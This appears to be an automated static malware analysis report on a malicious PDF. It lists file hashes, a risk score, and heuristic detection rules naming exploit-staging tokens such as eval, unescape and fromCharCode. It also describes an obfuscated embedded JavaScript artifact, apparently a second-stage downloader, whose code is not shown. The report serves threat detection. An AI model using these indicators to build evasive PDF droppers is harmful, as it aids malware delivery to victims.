Malicious PDF — malware analysis report

Static analysis result for SHA-256 51bc4fdadea397b2…

MALICIOUS

PDF

Size: 9.4 KB
Created: 2010-06-17 03:57:59
Authoring application: fRkOB (via A42zW)
First seen: 2026-05-10
MD5: 61a71ea8055cb2db7ae04551621edb8b
SHA-1: fe273b4690e628f8bd4d1604c77d4e923afa2dd4
SHA-256: 51bc4fdadea397b203d980d4baff6798b39973dcac12c3c5fb478ae2456e22cc
Risk Score: 166

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with a high-confidence eval() call, indicating obfuscated code execution. The JavaScript is likely intended to download and execute a second-stage payload. The obfuscation and the use of eval() suggest malicious intent, though the specific family cannot be determined from the available evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action | low | 2 related findings | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact | medium | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x245 | 8083 bytes
SHA-256: 2465641959e33a71d8e0c349ac89f4ddf32e6f419cebcb145f5fc5431f03d5f8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 122 of 170 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script